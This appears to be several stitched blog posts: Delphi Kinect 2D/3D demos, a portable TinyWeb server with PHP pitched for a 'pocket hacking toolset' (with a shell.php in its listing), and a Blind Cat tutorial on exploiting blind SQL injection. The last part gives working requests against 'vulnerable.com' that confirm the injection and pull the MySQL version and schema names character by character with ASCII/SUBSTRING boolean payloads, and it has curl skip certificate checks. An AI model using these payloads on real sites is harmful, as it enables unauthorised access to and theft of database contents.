Foreword: I am still in a Christmas mood. ;-) And considering a really huge interest in such "sparkling marriage" (Delphi and Kinect) and a very positive feedback from you guys, - I made some quick changes in the 3D demo, (which you should already know well), and added even more cool features. This is what was done:
- Most important thing: now you can grab 3D frames (3D data + 2D mapping), save it and run on a computer without Kinect! No need to have any drivers installed. You can give this program to your friends and they will be able to see your 3D pictures! :-)
- 2D to 3D mapping is fixed. It's still not ideal, but much better then before.
- You can switch on/off 2D and3D viewing mode. Pretty handy.
- It is possible to manage motor and change tilt of the Kinect.
- Newest version of Kinect.pas is included (Simon J Stuart - thank you for the update! More info about TKinect project is here)
- Bug fixed here and there.
EXE is precompiled as usual, so can be used right away. Here is the link to EXE and the source code in Delphi:
How to save/load3D frame
It's pretty easy actually. Select Frame --> Save from the main menu (you didn't expected anything else, yea?), then give a name without file extension. Program will grab the current frame and create 2 BMP files: one for 2D and the other for the 3D data (yes, they are just regular BMP files).
Those files would have a special suffix inside. A keywords: _KinectRGB and _KinectDepth.
If you want to open a frame: go to Frame --> Load and point to any of those two files. Program would find it's way to load them properly :-)
3D view on/off
There is nothing to explain here really.
Some sample images are included in the package (e.g. a nice 3D view of my corridor) :-)
This is it. Have fun and definitely drink enough to celebrate a New Year properly!
Well well well... All signs in the Sky and on the Earth clearly say: it's a Christmas time! So it's time to have some rest and fun, and definitely nothing can be better then to spend some time with family and a new toy. ;-) Actually it's my son who got the XBox with the Kinect, but well... let parents have some fun too, right!
It's not like I am trying to reinvent the wheel (there are plenty of applications using Kinect on PC), but recently I did not find any nice examples of how this incredibly cool thing can be used with Delphi. And you don't think I can leave it "just like that", don't you? ;-) So see the results below (video) and so more technical details of both applications (2D and 3D visualization). So as for today there will be no hacking, boys and girls, but just pure awesome 3D-virtual-reality joy... :-)
Ok, so you want to try to get those samples tweak them probably and run your own code? There is nothing more simple:
- Computer (PC) with hardware accelerated graphic card (anything with OPENGL hardware rendering).
- Kinect controller :-)
- Kinect windows drivers (NUI Group) http://nuigroup.com/...
- Simon J Stuart's TKinect component for Delphi taken from here: http://www.lakraven.com/... (you did EXCELLENT work, dude!)
- Super fast Delphi 2D Image processing library graphics32: http://www.graphics32.org/...
- GLScene (Delphi OPENGL library): http://glscene.sourceforge.net/...
Everything is installing like a charm. Some subtle obstacles with GLScene, but nothing too complicated to be mentioned really. Important: Before you run anything - be sure that the Kinect device is recognizable by your computer (check it in you Device Management panel).
Ach, almost forgotten: take the source files of my applications from here:
- 2D data visualization: http://itsecuritylab.eu/files/kinect/kinect_delphi_2d.zip
- 3D data visualization: http://itsecuritylab.eu/files/kinect/kinect_delphi_3dpoints.zip
Running all that stuff
Now you can try to compile and test both applications. More details about how those application can be used you have already seeing in the movie. Pre-compiled exe files are already included into ZIP packages, just for your convenience. So at the end this is what we have:
2D data visualization
The experiment showing how to collect, process and draw the Kinect's data on the screen. Rather typical,- you've seen it before for sure. Additional challenge was to write a function which would be able to "track blobs" - areas on the screen with similar pixels. This is needed to track your hands, fingers, nose or whatever you want to use. It is far far from ideal, but surprisingly works!
One more remark: this DOF function, selecting pixels in certain 3D range - is a part of the application, not the Kinect hardware.
I also hope you will forgive me such eeee... "untypical" way of getting depth data from pixel's color by such innocent transformation: RGB -> HLS -> [custom function] -> range [0..255]
3D data visualization
You can see my room (and actually yours too) in 3D in wobbling 3D virtual screen, containing tiny colorful dots :-) Do you like my Xmass tree?
So you see, Delphi is so nice and (important!) easy language (appropriate for lazy coders), so even writing pretty complex applications can take you just couple of hours. I also hope now even more people will start playing with Kinect and do some cool things, [so more happiness will come on Earth this Christmas, etc, etc.]. Remember: You are the controller®. Amen. :-)
This is it. Let me know it you like those crazy apps, and well... Have a nice Christmas and a happy New Year! :-)
You know, each of us has some tools we really like to use. Tools which are not "just good". We simply love them. They are nice-looking, reliable, and (this is especially important) - simple and easy to use. One of such little toys I use quite often in exploitation practice (and obviously, in many other weird experiments): is a freeware TinyWeb web server created by Maxim Masiutin from RitLabs. The server is extremely small (actually it's a single file only, about 60 Kb). Despite of it, this little creature serves HTML, executes CGI, supports SSL, writes logs, etc., etc. Full list of features you may find [here].
It's a really nice tool, and recently I had an opportunity to improve TinyWeb server a little bit, so want to share it with you. Obviously this is still not such a full-featured server as Wamp, but it is tiny, handy and can be a significant part of your "pocket hacking toolset". How to use it for your own benefit - I would leave it to you. :-)
So what functionality I added
- TinyWeb supports PHP (Yeeeeaa!). (Can you imagine a web server without PHP? I can't.) Surprisingly, original version of the server had some difficulties running PHP. Now source code is slightly changed, so everything works smoothly. Note: PHP is running as CGI.
- The server is 100% portable now! No need for installation or configuration: just copy it to any folder, make a single click and voila! everything is configured and running immediately (yes, PHP is also configured automatically).
- PHP files may be placed in any folder inside \wwwroot (note that in original TinyWeb server - CGI is handled only in \wwwroot\cgi-bin folder).
Looks good? Och, believe me, it is. Let's see what this little beast can do for us, but "first things first": see what you may download:
- TinyWeb Portable - web server with PHP support (binaries only, most recent PHP is included, CGI demo included) - recommended for download (about 9 MB).
- TinyWeb Portable - web server with PHP support (binaries only, CGI demo included).
- TinyWeb Portable - web server with SSL support (binaries only, SSL fully configured, CGI demo included).
Download source code:
- TinyWeb Portable - web server source code (with my modifications needed to support PHP, also includes the source code for "run_web_server.exe" utility) .
- Run_web_server.exe (the utility, source code only).
- Original TinyWeb 1.93 source code (from RitLabs).
Note that author (Maxim Masiutin) kindly published the source code of standard TinyWeb server only (without SSL support), so this is the only version which is modified by me now (hence supports PHP).
Running the little daemon
Ok, in our first example we will be using the version of the server with PHP support. Download it and unzip to any folder in you PC (you already did it, yea?). Now run the file "run_web_server.exe". Important: you must run it as Administrator. Same application may be used for both versions of TinyWeb: with and without SSL support. Once you have it running - everything should be self-explanatory (not much to configure really):
If you will be using the TinyWeb version with SSL - you would see the following info at the bottom:
Once we have the port chosen: press [RUN] button. Note that LPORT field is grayed now and button [RUN] is also disabled. Our server is running!
Now you can close this application completely, the TinyWeb server would be happily running in the background. How to stop the server? Oh I don't know, try to guess... ;-)
Is it really working?
Ok, the server is running, now let's browse the structure of our folders:
wwwroot ¦ index.htm ¦ index.php ¦ login.htm ¦ +---cgi-bin login.exe shell.php test.cmd test.php test.pl
Those files will be available "on-line" under following URLs:
http://localhost:81/index.htm http://localhost:81/index.php http://localhost:81/login.htm http://localhost:81/cgi-bin/shell.php http://localhost:81/cgi-bin/test.cmd http://localhost:81/cgi-bin/test.php http://localhost:81/cgi-bin/test.pl <-- to run this you must have Perl installed
Try to open it in your browser and see what would happen. :-) Actually any console program with stdIN and stdOUT may be easily handled by TinyWeb server (which is really handy).
Imagine that you have the following batch file:
When you navigate to the following URL: http://localhost:81/cgi-bin/test.cmd you can see in your browser something like this:
Nice, isn't it! :-)
Remember one important thing: PHP is supported in \wwwroot (also in any nested subfolder inside). CGI is handled only in \wwwroot\cgi-bin folder and any subfolders.
Couple of words about TinyWeb with SSL support
This is the original version of TinyWeb binary with SSL support, compiled by Maxim Masiutin. Source code unfortunately is not available, so I may not make necessary modifications, hence PHP is not supported. Sad but true.
Anyway you may download it from here along with sample SSL certificates (and of course with run_web_server.exe) and in fully portable form. So again - nothing to configure. Just unzip, and run!
Ok, It seems the Blind Cat tool was found to be pretty useful, so thanks all of you for downloading and testing! :-) If you don't know what is it - you are welcomed to read the previous article [here]. Recently I made some updates to the tool as during the last tests it happened that there were some issues when connecting to the target website over SSL. I think this is a good occasion to fix the thing (already done!) and explain one more time how everything works. You will see how easy is to exploit SQL injections with Blind Cat (if you know what you are doing...).
So how to use this blind... thing ;-)? Quick tutorial.
Before going further, download the new version 0.0.1.1 beta binary from [here]. Good. Now let's go through the test case step by step.
Step 1: Confirming SQL injection
So I am using Burp Suite and checking for SQL Injection in some well-know website. This is the HTTP header I am sending when testing "true" condition:
GET /shop/index.php?exec=serv&type=1&mid=15205%20or%201=1--%20&rand=2975386456123 HTTP/1.1 Host: vulnerable.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:220.127.116.11) Gecko/20100722 Firefox/3.6.8 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-gb,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://vulnerable.com/shop/login.php Cookie: PHPSESSID=8547113e62bf285f7f72e9688d098a54
...which gives me this:
Now I am changing the header and testing the "false" condition:
GET /shop/index.php?exec=serv&type=1&mid=15205%20or%201=2--%20&rand=2975386456123 HTTP/1.1 Host: vulnerable.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:18.104.22.168) Gecko/20100722 Firefox/3.6.8 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-gb,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://vulnerable.com/shop/login.php Cookie: PHPSESSID=8547113e62bf285f7f72e9688d098a54
...and the result is:
Very clean and nice example, right? To be sure we are really dealing with with SQL injection (not a kind of strange response from the web server) it does make sense to play some simple maths and send the following query (fragment of the header is below):
GET /shop/index.php?exec=serv&type=1&mid=15205%20or%205=(3+2)--%20&rand=2975386456123 HTTP/1.1 Host: vulnerable.com ...
Once the vulnerability is confirmed we may go forward and configure our CURL parameters. Note that I am sending GET request over HTTPS (it's important in our case).
Step 2. Configuring CURL
We should open curl.config file in our main Blind Cat folder and modify it the following way (keep attention to highlighted elements):
#-------------------------------------- custom header -H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:22.214.171.124) Gecko/20091102 Firefox/3.5.5" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" -H "Accept-Language: en-gb,en;q=0.5" -H "Keep-Alive: 300" -H "Content-Type: application/x-www-form-urlencoded" -H "Referer: https://vulnerable.com/shop/login.php" -H "Cookie: PHPSESSID=8547113e62bf285f7f72e9688d098a54" #-------------------------------------- target URL url https://vulnerable.com/shop/index.php?exec=serv&type=1&mid=15205%20or%201=1--%20&rand=2975386456123 #-------------------------------------- use proxy or not #-x localhost:8080 #-------------------------------------- do we need a header to preview? #--dump-header incoming_header.txt
Now we may run the batch file test_curl_settings.cmd which executes CURL with those parameters and stores the result in the file incoming_html.htm. We have 1=1 in our header, remember? Let's check the output file (should be some content there), then change the parameter to 1=2 and then check the output file again (now should be empty). If everything is working properly - now we are ready to extract the data from the back database!
Previous version of Blind Cat was not handling the crappy certificates properly, so in result you might have the following error:
So what I did, I let CURL completely ignore the certificates checking. SSL is still used but the certificate isn't verified anymore. So the appropriate tiny change was made in test_curl_settings.cmd file and in the Blind Cat's source code. FYI: curl.exe should be called the following way now:
curl --config curl.config -k
Step 3. Let's suck some data
Now we may try to extract some real data from the back system. For the beginning - classic: getting the SQL engine version number. Note: in this case we are dealing with MySQL. SQL query to be executed:
...which in our case transforms into something like this:
GET /shop/index.php?exec=serv&type=1&mid=15205%20or%201=(SELECT%20((SELECT%20ASCII(SUBSTRING(@@VERSION,<char_position>,1)))><char_value>))--%20&rand=2975386456123 HTTP/1.1 Host: vulnerable.com ....
Note that > is a "more" sign. Now let's try to list all databases. SQL query:
SELECT schema_name FROM information_schema.schemata
...magically transforms into:
GET /shop/index.php?exec=serv&type=1&mid=15205%20or%201=(SELECT%20((SELECT%20ASCII(SUBSTRING((SELECT%20schema_name%20FROM%20information_schema.schemata%20LIMIT%20<main_iterator>,1),<char_position>,1)))><char_value>))--%20&rand=2975386456123 HTTP/1.1 Host: vulnerable.com ....
The only difference in this case is that we will be reading the multi-line output line by line, so adding LIMIT <x>, 1. Just for any case, let me remind you one more time about where those values are taken from: